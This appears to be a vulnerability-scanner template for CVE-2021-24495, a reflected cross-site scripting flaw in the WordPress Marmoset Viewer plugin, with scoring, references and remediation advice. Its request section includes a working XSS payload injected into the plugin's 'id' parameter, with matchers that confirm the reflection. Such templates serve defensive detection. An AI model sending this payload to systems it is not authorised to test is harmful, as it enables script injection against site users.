id: CVE-2021-24495 info: name: Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting author: johnjhacking severity: medium description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page. remediation: | Update the Wordpress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability. reference: - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://wordpress.org/plugins/marmoset-viewer/#developers - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638 - https://nvd.nist.gov/vuln/detail/CVE-2021-24495 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24495 cwe-id: CWE-79 epss-score: 0.00116 epss-percentile: 0.4515 cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: marmoset product: marmoset_viewer framework: wordpress tags: xss,wpscan,cve,cve2021,wp-plugin,wordpress,intrusive http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a" matchers-condition: and matchers: - type: word part: body words: - - alert(/{{randstr}}/) condition: or - type: word words: - Marmoset Viewer - type: status status: - 200 # digest: 490a004630440220224913fbfe79812723f6c3c9520ff926a2736b836db31dff069f66e5b168171302206f9386d76c364eee916825bdc31bdb38c014db733c726fc0a8ccf645051a05f9:922c64590222798bb761d5b6d8e72950